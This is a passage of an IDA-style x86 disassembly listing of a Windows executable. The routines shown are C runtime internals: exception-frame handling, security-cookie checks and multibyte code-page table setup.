push eax
mov eax, [ebp+arg_0]
push dword ptr [eax]
call [ebp+var_2C]
pop ecx
pop ecx
and [ebp+var_38], 0
loc_40439D: ; DATA XREF: sub_4042F4+10�o
cmp [ebp+var_4], 0
jz short loc_4043BA
mov ebx, large fs:0
mov eax, [ebx]
mov ebx, [ebp+var_28]
mov [ebx], eax
mov large fs:0, ebx
jmp short loc_4043C3
; ---------------------------------------------------------------------------
loc_4043BA: ; CODE XREF: sub_4042F4+AD�j
mov eax, [ebp+var_28]
mov large fs:0, eax
loc_4043C3: ; CODE XREF: sub_4042F4+C4�j
mov eax, [ebp+var_38]
loc_4043C6: ; CODE XREF: sub_4042F4+1D�j
pop ebx
leave
retn
sub_4042F4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4043C9 proc near ; DATA XREF: sub_4042F4+26�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ebx
cld
mov eax, [ebp+arg_4]
mov ecx, [eax+8]
xor ecx, [ebp+arg_4]
call sub_402710
mov eax, [ebp+arg_0]
mov eax, [eax+4]
and eax, 66h
jz short loc_4043F9
mov eax, [ebp+arg_4]
mov dword ptr [eax+24h], 1
xor eax, eax
inc eax
jmp short loc_404463
; ---------------------------------------------------------------------------
jmp short loc_404463
; ---------------------------------------------------------------------------
loc_4043F9: ; CODE XREF: sub_4043C9+1D�j
push 1
mov eax, [ebp+arg_4]
push dword ptr [eax+18h]
mov eax, [ebp+arg_4]
push dword ptr [eax+14h]
mov eax, [ebp+arg_4]
push dword ptr [eax+0Ch]
push 0
push [ebp+arg_8]
mov eax, [ebp+arg_4]
push dword ptr [eax+10h]
push [ebp+arg_0]
call sub_40BD75
add esp, 20h
mov eax, [ebp+arg_4]
cmp dword ptr [eax+24h], 0
jnz short loc_404437
push [ebp+arg_0]
push [ebp+arg_4]
call sub_40423C
loc_404437: ; CODE XREF: sub_4043C9+61�j
push 0
push 0
push 0
push 0
push 0
lea eax, [ebp+var_4]
push eax
push 123h
call sub_4042F4
add esp, 1Ch
mov eax, [ebp+var_4]
mov ebx, [ebp+arg_4]
mov esp, [ebx+1Ch]
mov ebp, [ebx+20h]
jmp eax
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
loc_404463: ; CODE XREF: sub_4043C9+2C�j
; sub_4043C9+2E�j
pop ebx
leave
retn
sub_4043C9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404466 proc near ; CODE XREF: sub_40B915+81�p
; sub_40BA07+1C6�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
mov eax, [edi+10h]
mov esi, [edi+0Ch]
mov [ebp+var_4], eax
mov ebx, esi
jmp short loc_4044AA
; ---------------------------------------------------------------------------
loc_40447D: ; CODE XREF: sub_404466+4B�j
cmp esi, 0FFFFFFFFh
jnz short loc_404487
call sub_40BEA5
loc_404487: ; CODE XREF: sub_404466+1A�j
mov ecx, [ebp+var_4]
dec esi
mov eax, esi
imul eax, 14h
add eax, ecx
mov ecx, [ebp+arg_8]
cmp [eax+4], ecx
jge short loc_40449F
cmp ecx, [eax+8]
jle short loc_4044A4
loc_40449F: ; CODE XREF: sub_404466+32�j
cmp esi, 0FFFFFFFFh
jnz short loc_4044AD
loc_4044A4: ; CODE XREF: sub_404466+37�j
dec [ebp+arg_4]
mov ebx, [ebp+arg_0]
loc_4044AA: ; CODE XREF: sub_404466+15�j
mov [ebp+arg_0], esi
loc_4044AD: ; CODE XREF: sub_404466+3C�j
cmp [ebp+arg_4], 0
jge short loc_40447D
mov eax, [ebp+arg_C]
inc esi
mov [eax], esi
mov eax, [ebp+arg_10]
mov [eax], ebx
cmp ebx, [edi+0Ch]
ja short loc_4044C7
cmp esi, ebx
jbe short loc_4044CC
loc_4044C7: ; CODE XREF: sub_404466+5B�j
call sub_40BEA5
loc_4044CC: ; CODE XREF: sub_404466+5F�j
mov eax, esi
imul eax, 14h
add eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_404466 endp
; =============== S U B R O U T I N E =======================================
sub_4044D9 proc near ; CODE XREF: sub_40B4FD+28�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push esi
mov esi, [esp+4+arg_0]
mov [esi], eax
call sub_40539D
mov eax, [eax+98h]
mov [esi+4], eax
call sub_40539D
mov [eax+98h], esi
mov eax, esi
pop esi
retn
sub_4044D9 endp
; =============== S U B R O U T I N E =======================================
sub_404501 proc near ; CODE XREF: sub_40B623+60�p
arg_0 = dword ptr 4
call sub_40539D
mov eax, [eax+98h]
jmp short loc_404519
; ---------------------------------------------------------------------------
loc_40450E: ; CODE XREF: sub_404501+1A�j
mov ecx, [eax]
cmp ecx, [esp+arg_0]
jz short loc_40451F
mov eax, [eax+4]
loc_404519: ; CODE XREF: sub_404501+B�j
test eax, eax
jnz short loc_40450E
inc eax
retn
; ---------------------------------------------------------------------------
loc_40451F: ; CODE XREF: sub_404501+13�j
xor eax, eax
retn
sub_404501 endp
; =============== S U B R O U T I N E =======================================
sub_404522 proc near ; CODE XREF: sub_40B623+9�p
arg_0 = dword ptr 4
push esi
call sub_40539D
mov esi, [esp+4+arg_0]
cmp esi, [eax+98h]
jnz short loc_404544
call sub_40539D
mov ecx, [esi+4]
mov [eax+98h], ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_404544: ; CODE XREF: sub_404522+10�j
call sub_40539D
mov eax, [eax+98h]
jmp short loc_40455A
; ---------------------------------------------------------------------------
loc_404551: ; CODE XREF: sub_404522+3C�j
mov ecx, [eax+4]
cmp esi, ecx
jz short loc_404566
mov eax, ecx
loc_40455A: ; CODE XREF: sub_404522+2D�j
cmp dword ptr [eax+4], 0
jnz short loc_404551
pop esi
jmp sub_40BEA5
; ---------------------------------------------------------------------------
loc_404566: ; CODE XREF: sub_404522+34�j
mov ecx, [esi+4]
mov [eax+4], ecx
pop esi
retn
sub_404522 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40456E proc near ; CODE XREF: sub_40B4FD+7F�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 18h
mov eax, ds:dword_423064
and [ebp+var_18], 0
lea ecx, [ebp+var_18]
xor eax, ecx
mov ecx, [ebp+arg_0]
mov [ebp+var_10], eax
mov eax, [ebp+arg_4]
mov [ebp+var_C], eax
mov eax, [ebp+arg_C]
inc eax
mov [ebp+var_14], offset loc_4042C4
mov [ebp+var_8], ecx
mov [ebp+var_4], eax
mov eax, large fs:0
mov [ebp+var_18], eax
lea eax, [ebp+var_18]
mov large fs:0, eax
push [ebp+arg_10]
push ecx
push [ebp+arg_8]
call sub_40BEF0
mov ecx, eax
mov eax, [ebp+var_18]
mov large fs:0, eax
mov eax, ecx
leave
retn
sub_40456E endp
; =============== S U B R O U T I N E =======================================
sub_4045CC proc near ; CODE XREF: sub_401065+7�p
; sub_40121E+7�p ...
arg_0 = byte ptr 4
push eax
push large dword ptr fs:0
lea eax, [esp+8+arg_0]
sub esp, [esp+0Ch]
push ebx
push esi
push edi
mov [eax], ebp
mov ebp, eax
mov eax, ds:dword_423064
xor eax, ebp
push eax
push dword ptr [ebp-4]
mov dword ptr [ebp-4], 0FFFFFFFFh
lea eax, [ebp-0Ch]
mov large fs:0, eax
retn
sub_4045CC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4045FF proc near ; CODE XREF: sub_401442+7�p
; sub_40B4B4+7�p
arg_0 = byte ptr 4
push eax
push large dword ptr fs:0
lea eax, [esp+8+arg_0]
sub esp, [esp+0Ch]
push ebx
push esi
push edi
mov [eax], ebp
mov ebp, eax
mov eax, ds:dword_423064
xor eax, ebp
push eax
mov [ebp-10h], esp
push dword ptr [ebp-4]
mov dword ptr [ebp-4], 0FFFFFFFFh
lea eax, [ebp-0Ch]
mov large fs:0, eax
retn
sub_4045FF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404635 proc near ; CODE XREF: sub_40177B+A�p
; sub_4019F3+A�p ...
arg_0 = byte ptr 4
push eax
push large dword ptr fs:0
lea eax, [esp+8+arg_0]
sub esp, [esp+0Ch]
push ebx
push esi
push edi
mov [eax], ebp
mov ebp, eax
mov eax, ds:dword_423064
xor eax, ebp
push eax
mov [ebp-10h], eax
push dword ptr [ebp-4]
mov dword ptr [ebp-4], 0FFFFFFFFh
lea eax, [ebp-0Ch]
mov large fs:0, eax
retn
sub_404635 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40466B proc near ; CODE XREF: sub_401065+2D�p
; sub_40121E+6B�p ...
mov ecx, [ebp-0Ch]
mov large fs:0, ecx
pop ecx
pop edi
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
push ecx
retn
sub_40466B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40467F proc near ; CODE XREF: sub_40177B:loc_4019EB�p
; sub_4019F3:loc_401C15�p ...
mov ecx, [ebp-10h]
xor ecx, ebp
call sub_402710
jmp sub_40466B
sub_40467F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40468E proc near ; CODE XREF: sub_402710:loc_40271A�j
var_328 = dword ptr -328h
var_324 = dword ptr -324h
var_320 = dword ptr -320h
arg_0 = byte ptr 8
push ebp
mov ebp, esp
sub esp, 328h
mov ds:dword_425BA8, eax
mov ds:dword_425BA4, ecx
mov ds:dword_425BA0, edx
mov ds:dword_425B9C, ebx
mov ds:dword_425B98, esi
mov ds:dword_425B94, edi
mov ds:word_425BC0, ss
mov ds:word_425BB4, cs
mov ds:word_425B90, ds
mov ds:word_425B8C, es
mov ds:word_425B88, fs
mov ds:word_425B84, gs
pushf
pop ds:dword_425BB8
mov eax, [ebp+0]
mov ds:dword_425BAC, eax
mov eax, [ebp+4]
mov ds:dword_425BB0, eax
lea eax, [ebp+arg_0]
mov ds:dword_425BBC, eax
mov eax, [ebp+var_320]
mov ds:dword_425AF8, 10001h
mov eax, ds:dword_425BB0
mov ds:dword_425AAC, eax
mov ds:dword_425AA0, 0C0000409h
mov ds:dword_425AA4, 1
mov eax, ds:dword_423064
mov [ebp+var_328], eax
mov eax, ds:dword_423068
mov [ebp+var_324], eax
call ds:dword_41D090
mov ds:dword_425AF0, eax
push 1
call sub_407B65
pop ecx
push 0
call ds:dword_41D19C
push offset off_41D3F8
call ds:dword_41D198 ; UnhandledExceptionFilter
cmp ds:dword_425AF0, 0
jnz short loc_40477E
push 1
call sub_407B65
pop ecx
loc_40477E: ; CODE XREF: sub_40468E+E6�j
push 0C0000409h
call ds:dword_41D0CC
push eax
call ds:dword_41D0F8
leave
retn
sub_40468E endp
; =============== S U B R O U T I N E =======================================
sub_404792 proc near ; CODE XREF: sub_404ABE+11E�p
; sub_404ABE+173�p
sub eax, 3A4h
jz short loc_4047BB
sub eax, 4
jz short loc_4047B5
sub eax, 0Dh
jz short loc_4047AF
dec eax
jz short loc_4047A9
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4047A9: ; CODE XREF: sub_404792+12�j
mov eax, 404h
retn
; ---------------------------------------------------------------------------
loc_4047AF: ; CODE XREF: sub_404792+F�j
mov eax, 412h
retn
; ---------------------------------------------------------------------------
loc_4047B5: ; CODE XREF: sub_404792+A�j
mov eax, 804h
retn
; ---------------------------------------------------------------------------
loc_4047BB: ; CODE XREF: sub_404792+5�j
mov eax, 411h
retn
sub_404792 endp
; =============== S U B R O U T I N E =======================================
sub_4047C1 proc near ; CODE XREF: sub_404ABE+2B�p
push ebx
push ebp
push esi
push edi
mov ebp, 101h
mov esi, eax
push ebp
xor edi, edi
lea ebx, [esi+1Ch]
push edi
push ebx
call sub_407B70
mov [esi+4], edi
mov [esi+8], edi
mov [esi+0Ch], edi
xor eax, eax
lea edi, [esi+10h]
stosd
stosd
stosd
mov eax, offset dword_423070
add esp, 0Ch
sub eax, esi
loc_4047F4: ; CODE XREF: sub_4047C1+3A�j
mov cl, [eax+ebx]
mov [ebx], cl
inc ebx
dec ebp
jnz short loc_4047F4
lea ecx, [esi+11Dh]
mov esi, 100h
loc_404808: ; CODE XREF: sub_4047C1+4E�j
mov dl, [ecx+eax]
mov [ecx], dl
inc ecx
dec esi
jnz short loc_404808
pop edi
pop esi
pop ebp
pop ebx
retn
sub_4047C1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=49Ch
sub_404816 proc near ; CODE XREF: sub_404ABE+141�p
var_51C = dword ptr -51Ch
var_518 = byte ptr -518h
var_512 = byte ptr -512h
var_511 = byte ptr -511h
var_504 = word ptr -504h
var_304 = byte ptr -304h
var_204 = byte ptr -204h
var_104 = byte ptr -104h
var_4 = dword ptr -4
push ebp
lea ebp, [esp-49Ch]
sub esp, 51Ch
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+49Ch+var_4], eax
push ebx
push edi
lea eax, [ebp+49Ch+var_518]
push eax
push dword ptr [esi+4]
call ds:dword_41D1B4
test eax, eax
mov edi, 100h
jz loc_40493C
xor eax, eax
loc_40484F: ; CODE XREF: sub_404816+43�j
mov [ebp+eax+49Ch+var_104], al
inc eax
cmp eax, edi
jb short loc_40484F
mov al, [ebp+49Ch+var_512]
test al, al
mov [ebp+49Ch+var_104], 20h
jz short loc_404894
lea ebx, [ebp+49Ch+var_511]
loc_40486C: ; CODE XREF: sub_404816+7C�j
movzx ecx, al
movzx eax, byte ptr [ebx]
cmp ecx, eax
ja short loc_40488C
sub eax, ecx
inc eax
push eax
lea edx, [ebp+ecx+49Ch+var_104]
push 20h
push edx
call sub_407B70
add esp, 0Ch
loc_40488C: ; CODE XREF: sub_404816+5E�j
inc ebx
mov al, [ebx]
inc ebx
test al, al
jnz short loc_40486C
loc_404894: ; CODE XREF: sub_404816+51�j
push 0
push dword ptr [esi+0Ch]
lea eax, [ebp+49Ch+var_504]
push dword ptr [esi+4]
push eax
push edi
lea eax, [ebp+49Ch+var_104]
push eax
push 1
push 0
call sub_40C4F4
xor ebx, ebx
push ebx
push dword ptr [esi+4]
lea eax, [ebp+49Ch+var_204]
push edi
push eax
push edi
lea eax, [ebp+49Ch+var_104]
push eax
push edi
push dword ptr [esi+0Ch]
push ebx
call sub_40C2F9
add esp, 44h
push ebx
push dword ptr [esi+4]
lea eax, [ebp+49Ch+var_304]
push edi
push eax
push edi
lea eax, [ebp+49Ch+var_104]
push eax
push 200h
push dword ptr [esi+0Ch]
push ebx
call sub_40C2F9
add esp, 24h
xor eax, eax
loc_4048FB: ; CODE XREF: sub_404816+122�j
movzx ecx, [ebp+eax*2+49Ch+var_504]
test cl, 1
jz short loc_404913
or byte ptr [esi+eax+1Dh], 10h
mov cl, [ebp+eax+49Ch+var_204]
jmp short loc_404924
; ---------------------------------------------------------------------------
loc_404913: ; CODE XREF: sub_404816+ED�j
test cl, 2
jz short loc_40492D
or byte ptr [esi+eax+1Dh], 20h
mov cl, [ebp+eax+49Ch+var_304]
loc_404924: ; CODE XREF: sub_404816+FB�j
mov [esi+eax+11Dh], cl
jmp short loc_404935
; ---------------------------------------------------------------------------
loc_40492D: ; CODE XREF: sub_404816+100�j
mov byte ptr [esi+eax+11Dh], 0
loc_404935: ; CODE XREF: sub_404816+115�j
inc eax
cmp eax, edi
jb short loc_4048FB
jmp short loc_404989
; ---------------------------------------------------------------------------
loc_40493C: ; CODE XREF: sub_404816+31�j
lea eax, [esi+11Dh]
mov [ebp+49Ch+var_51C], 0FFFFFF9Fh
xor ecx, ecx
sub [ebp+49Ch+var_51C], eax
loc_40494E: ; CODE XREF: sub_404816+171�j
mov edx, [ebp+49Ch+var_51C]
lea eax, [esi+ecx+11Dh]
add edx, eax
lea ebx, [edx+20h]
cmp ebx, 19h
ja short loc_40496E
or byte ptr [esi+ecx+1Dh], 10h
mov dl, cl
add dl, 20h
jmp short loc_40497D
; ---------------------------------------------------------------------------
loc_40496E: ; CODE XREF: sub_404816+14A�j
cmp edx, 19h
ja short loc_404981
or byte ptr [esi+ecx+1Dh], 20h
mov dl, cl
sub dl, 20h
loc_40497D: ; CODE XREF: sub_404816+156�j
mov [eax], dl
jmp short loc_404984
; ---------------------------------------------------------------------------
loc_404981: ; CODE XREF: sub_404816+15B�j
mov byte ptr [eax], 0
loc_404984: ; CODE XREF: sub_404816+169�j
inc ecx
cmp ecx, edi
jb short loc_40494E
loc_404989: ; CODE XREF: sub_404816+124�j
mov ecx, [ebp+49Ch+var_4]
pop edi
xor ecx, ebp
pop ebx
call sub_402710
add ebp, 49Ch
leave
retn
sub_404816 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4049A0 proc near ; CODE XREF: sub_40271F+57�p
; sub_404C69+1A�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset dword_421430
call __SEH_prolog4
call sub_40539D
mov edi, eax
mov eax, ds:dword_423594
test [edi+70h], eax
jz short loc_4049DA
cmp dword ptr [edi+6Ch], 0
jz short loc_4049DA
mov esi, [edi+68h]
loc_4049C6: ; CODE XREF: sub_4049A0+96�j
test esi, esi
jnz short loc_4049D2
push 20h
call sub_40785D
pop ecx
loc_4049D2: ; CODE XREF: sub_4049A0+28�j
mov eax, esi
call __SEH_epilog4
retn
; ---------------------------------------------------------------------------
loc_4049DA: ; CODE XREF: sub_4049A0+1B�j
; sub_4049A0+21�j
push 0Dh
call sub_4059F7
pop ecx
and [ebp+ms_exc.disabled], 0
mov esi, [edi+68h]
mov [ebp+var_1C], esi
cmp esi, ds:off_423498
jz short loc_404A2A
test esi, esi
jz short loc_404A12
push esi
call ds:dword_41D1BC
test eax, eax
jnz short loc_404A12
cmp esi, offset dword_423070
jz short loc_404A12
push esi
call sub_403603
pop ecx
loc_404A12: ; CODE XREF: sub_4049A0+56�j
; sub_4049A0+61�j ...
mov eax, ds:off_423498
mov [edi+68h], eax
mov esi, ds:off_423498
mov [ebp+var_1C], esi
push esi
call ds:dword_41D1B8
loc_404A2A: ; CODE XREF: sub_4049A0+52�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_404A3B
jmp short loc_4049C6
sub_4049A0 endp
; =============== S U B R O U T I N E =======================================
sub_404A38 proc near ; DATA XREF: .kSjx934:00421448�o
mov esi, [ebp-1Ch]
sub_404A38 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404A3B proc near ; CODE XREF: sub_4049A0+91�p
push 0Dh
call sub_40591F
pop ecx
retn
sub_404A3B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404A44 proc near ; CODE XREF: sub_404ABE+19�p
; sub_404C69+25�p
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 10h
push ebx
xor ebx, ebx
push ebx
lea ecx, [ebp+var_10]
call sub_40271F
cmp esi, 0FFFFFFFEh
mov ds:dword_425DC4, ebx
jnz short loc_404A7F
mov ds:dword_425DC4, 1
call ds:dword_41D188
loc_404A71: ; CODE XREF: sub_404A44+50�j
; sub_404A44+67�j
cmp [ebp+var_4], bl
jz short loc_404ABB
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
jmp short loc_404ABB
; ---------------------------------------------------------------------------
loc_404A7F: ; CODE XREF: sub_404A44+1B�j
cmp esi, 0FFFFFFFDh
jnz short loc_404A96
mov ds:dword_425DC4, 1
call ds:dword_41D18C
jmp short loc_404A71
; ---------------------------------------------------------------------------
loc_404A96: ; CODE XREF: sub_404A44+3E�j
cmp esi, 0FFFFFFFCh
jnz short loc_404AAD
mov eax, [ebp+var_10]
mov eax, [eax+4]
mov ds:dword_425DC4, 1
jmp short loc_404A71
; ---------------------------------------------------------------------------
loc_404AAD: ; CODE XREF: sub_404A44+55�j
cmp [ebp+var_4], bl
jz short loc_404AB9
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_404AB9: ; CODE XREF: sub_404A44+6C�j
mov eax, esi
loc_404ABB: ; CODE XREF: sub_404A44+30�j
; sub_404A44+39�j
pop ebx
leave
retn
sub_404A44 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404ABE proc near ; CODE XREF: sub_404C69+5E�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push ebx
mov ebx, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
push edi
call sub_404A44
mov edi, eax
xor esi, esi
cmp edi, esi
mov [ebp+arg_0], edi
jnz short loc_404AF5
loc_404AE7: ; CODE XREF: sub_404ABE+193�j
mov eax, ebx
call sub_4047C1
loc_404AEE: ; CODE XREF: sub_404ABE+146�j
xor eax, eax
jmp loc_404C5A
; ---------------------------------------------------------------------------
loc_404AF5: ; CODE XREF: sub_404ABE+27�j
mov [ebp+var_1C], esi
xor eax, eax
loc_404AFA: ; CODE XREF: sub_404ABE+4F�j
cmp ds:dword_4234A0[eax], edi
jz short loc_404B69
inc [ebp+var_1C]
add eax, 30h
cmp eax, 0F0h
jb short loc_404AFA
lea eax, [ebp+var_18]
push eax
push edi
call ds:dword_41D1B4
test eax, eax
jz loc_404C4B
push 101h
lea eax, [ebx+1Ch]
push esi
push eax
call sub_407B70
xor edx, edx
inc edx
add esp, 0Ch
cmp [ebp+var_18], edx
mov [ebx+4], edi
mov [ebx+0Ch], esi
jbe loc_404C3E
cmp [ebp+var_12], 0
jz loc_404C1F
lea esi, [ebp+var_11]
loc_404B53: ; CODE XREF: sub_404ABE+15B�j
mov cl, [esi]
test cl, cl
jz loc_404C1F
movzx eax, byte ptr [esi-1]
movzx ecx, cl
jmp loc_404C0F
; ---------------------------------------------------------------------------
loc_404B69: ; CODE XREF: sub_404ABE+42�j
push 101h
lea eax, [ebx+1Ch]
push esi
push eax
call sub_407B70
mov ecx, [ebp+var_1C]
add esp, 0Ch
imul ecx, 30h
mov [ebp+var_20], esi
lea esi, dword_4234B0[ecx]
mov [ebp+var_1C], esi
jmp short loc_404BB9
; ---------------------------------------------------------------------------
loc_404B8F: ; CODE XREF: sub_404ABE+FE�j
mov al, [esi+1]
test al, al
jz short loc_404BBE
movzx edi, byte ptr [esi]
movzx eax, al
jmp short loc_404BB0
; ---------------------------------------------------------------------------
loc_404B9E: ; CODE XREF: sub_404ABE+F4�j
mov eax, [ebp+var_20]
mov al, ds:byte_42349C[eax]
or [ebx+edi+1Dh], al
movzx eax, byte ptr [esi+1]
inc edi
loc_404BB0: ; CODE XREF: sub_404ABE+DE�j
cmp edi, eax
jbe short loc_404B9E
mov edi, [ebp+arg_0]
inc esi
inc esi
loc_404BB9: ; CODE XREF: sub_404ABE+CF�j
; sub_404ABE+110�j
cmp byte ptr [esi], 0
jnz short loc_404B8F
loc_404BBE: ; CODE XREF: sub_404ABE+D6�j
mov esi, [ebp+var_1C]
inc [ebp+var_20]
add esi, 8
cmp [ebp+var_20], 4
mov [ebp+var_1C], esi
jb short loc_404BB9
mov eax, edi
mov [ebx+4], edi
mov dword ptr [ebx+8], 1
call sub_404792
push 6
mov [ebx+0Ch], eax
lea eax, [ebx+10h]
lea ecx, dword_4234A4[ecx]
pop edx
loc_404BF0: ; CODE XREF: sub_404ABE+13D�j
mov si, [ecx]
inc ecx
mov [eax], si
inc ecx
inc eax
inc eax
dec edx
jnz short loc_404BF0
loc_404BFD: ; CODE XREF: sub_404ABE+18B�j
mov esi, ebx
call sub_404816
jmp loc_404AEE
; ---------------------------------------------------------------------------
loc_404C09: ; CODE XREF: sub_404ABE+153�j
or byte ptr [ebx+eax+1Dh], 4
inc eax
loc_404C0F: ; CODE XREF: sub_404ABE+A6�j
cmp eax, ecx
jbe short loc_404C09
inc esi
inc esi
cmp byte ptr [esi-1], 0
jnz loc_404B53
loc_404C1F: ; CODE XREF: sub_404ABE+8C�j
; sub_404ABE+99�j
lea eax, [ebx+1Eh]
mov ecx, 0FEh
loc_404C27: ; CODE XREF: sub_404ABE+16E�j
or byte ptr [eax], 8
inc eax
dec ecx
jnz short loc_404C27
mov eax, [ebx+4]
call sub_404792
mov [ebx+0Ch], eax
mov [ebx+8], edx
jmp short loc_404C41
; ---------------------------------------------------------------------------
loc_404C3E: ; CODE XREF: sub_404ABE+82�j
mov [ebx+8], esi
loc_404C41: ; CODE XREF: sub_404ABE+17E�j
xor eax, eax
lea edi, [ebx+10h]
stosd
stosd
stosd
jmp short loc_404BFD
; ---------------------------------------------------------------------------
loc_404C4B: ; CODE XREF: sub_404ABE+5E�j
cmp ds:dword_425DC4, esi
jnz loc_404AE7
or eax, 0FFFFFFFFh
loc_404C5A: ; CODE XREF: sub_404ABE+32�j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_404ABE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404C69 proc near ; CODE XREF: sub_404E03+B�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 00404DD5 SIZE 0000002E BYTES
push 14h
push offset dword_421450
call __SEH_prolog4
or [ebp+var_20], 0FFFFFFFFh
call sub_40539D
mov edi, eax
mov [ebp+var_24], edi
call sub_4049A0
mov ebx, [edi+68h]
mov esi, [ebp+arg_0]
call sub_404A44
mov [ebp+arg_0], eax
cmp eax, [ebx+4]
jz loc_404DF6
push 220h
call sub_40773A
pop ecx
mov ebx, eax
test ebx, ebx
jz loc_404DFA
mov ecx, 88h
mov esi, [edi+68h]
mov edi, ebx
rep movsd
and dword ptr [ebx], 0
push ebx
push [ebp+arg_0]
call sub_404ABE
pop ecx
pop ecx
mov [ebp+var_20], eax
test eax, eax
jnz loc_404DD5
mov esi, [ebp+var_24]
push dword ptr [esi+68h]
call ds:dword_41D1BC
test eax, eax
jnz short loc_404CFA
mov eax, [esi+68h]
cmp eax, offset dword_423070
jz short loc_404CFA
push eax
call sub_403603
pop ecx
loc_404CFA: ; CODE XREF: sub_404C69+7E�j
; sub_404C69+88�j
mov [esi+68h], ebx
push ebx
mov edi, ds:dword_41D1B8
call edi
test byte ptr [esi+70h], 2
jnz loc_404DFA
test byte ptr ds:dword_423594, 1
jnz loc_404DFA
push 0Dh
call sub_4059F7
pop ecx
and [ebp+ms_exc.disabled], 0
mov eax, [ebx+4]
mov ds:dword_425DD4, eax
mov eax, [ebx+8]
mov ds:dword_425DD8, eax
mov eax, [ebx+0Ch]
mov ds:dword_425DDC, eax
xor eax, eax
loc_404D43: ; CODE XREF: sub_404C69+F0�j
mov [ebp+var_1C], eax
cmp eax, 5
jge short loc_404D5B
mov cx, [ebx+eax*2+10h]
mov ds:word_425DC8[eax*2], cx
inc eax
jmp short loc_404D43
; ---------------------------------------------------------------------------
loc_404D5B: ; CODE XREF: sub_404C69+E0�j
xor eax, eax
loc_404D5D: ; CODE XREF: sub_404C69+109�j
mov [ebp+var_1C], eax
cmp eax, 101h
jge short loc_404D74
mov cl, [eax+ebx+1Ch]
mov ds:byte_423290[eax], cl
inc eax
jmp short loc_404D5D
; ---------------------------------------------------------------------------
loc_404D74: ; CODE XREF: sub_404C69+FC�j
xor eax, eax
loc_404D76: ; CODE XREF: sub_404C69+125�j
mov [ebp+var_1C], eax
cmp eax, 100h
jge short loc_404D90
mov cl, [eax+ebx+11Dh]
mov ds:byte_423398[eax], cl
inc eax
jmp short loc_404D76
; ---------------------------------------------------------------------------
loc_404D90: ; CODE XREF: sub_404C69+115�j
push ds:off_423498
call ds:dword_41D1BC
test eax, eax
jnz short loc_404DB3
mov eax, ds:off_423498
cmp eax, offset dword_423070
jz short loc_404DB3
push eax
call sub_403603
pop ecx
loc_404DB3: ; CODE XREF: sub_404C69+135�j
; sub_404C69+141�j
mov ds:off_423498, ebx
push ebx
call edi
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_404DCA
jmp short loc_404DFA
sub_404C69 endp
; =============== S U B R O U T I N E =======================================
sub_404DCA proc near ; CODE XREF: sub_404C69+15A�p
; DATA XREF: .kSjx934:00421468�o
push 0Dh
call sub_40591F
pop ecx
retn
sub_404DCA endp
; ---------------------------------------------------------------------------
jmp short loc_404DFA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_404C69
loc_404DD5: ; CODE XREF: sub_404C69+6A�j
cmp eax, 0FFFFFFFFh
jnz short loc_404DFA
cmp ebx, offset dword_423070
jz short loc_404DE9
push ebx
call sub_403603
pop ecx
loc_404DE9: ; CODE XREF: sub_404C69+177�j
call sub_4057D3
mov dword ptr [eax], 16h
jmp short loc_404DFA
; ---------------------------------------------------------------------------
loc_404DF6: ; CODE XREF: sub_404C69+30�j
and [ebp+var_20], 0
loc_404DFA: ; CODE XREF: sub_404C69+45�j
; sub_404C69+A1�j ...
mov eax, [ebp+var_20]
call __SEH_epilog4
